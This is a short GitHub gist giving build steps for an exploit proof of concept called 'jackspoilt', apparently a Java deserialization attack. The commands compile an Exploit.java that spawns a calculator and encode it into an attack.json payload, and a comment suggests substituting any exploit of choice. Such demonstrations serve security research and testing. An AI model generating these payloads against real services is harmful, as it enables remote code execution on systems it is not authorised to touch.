Skip to content

Instantly share code, notes, and snippets.

@conikeec
Last active May 6, 2018 13:57
Show Gist options
  • Save conikeec/d944db7ab5ab2f2e8eec39f472a2b06f to your computer and use it in GitHub Desktop.
Save conikeec/d944db7ab5ab2f2e8eec39f472a2b06f to your computer and use it in GitHub Desktop.
cd jackspoilt
# create the exploit by editing ./master/exploit/Exploit.java
# current version adds errros to log and spawns a calculator on OSX
# (For Linux based OS please revise the line to specify an exploit of your choice)
# compile ./master/exploit/Exploit.java
mvn exec:java -D"exec.mainClass"="EncodeExploit"
# The command above creates attack.json in the attackscripts directory
more attackscripts/attack.json
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment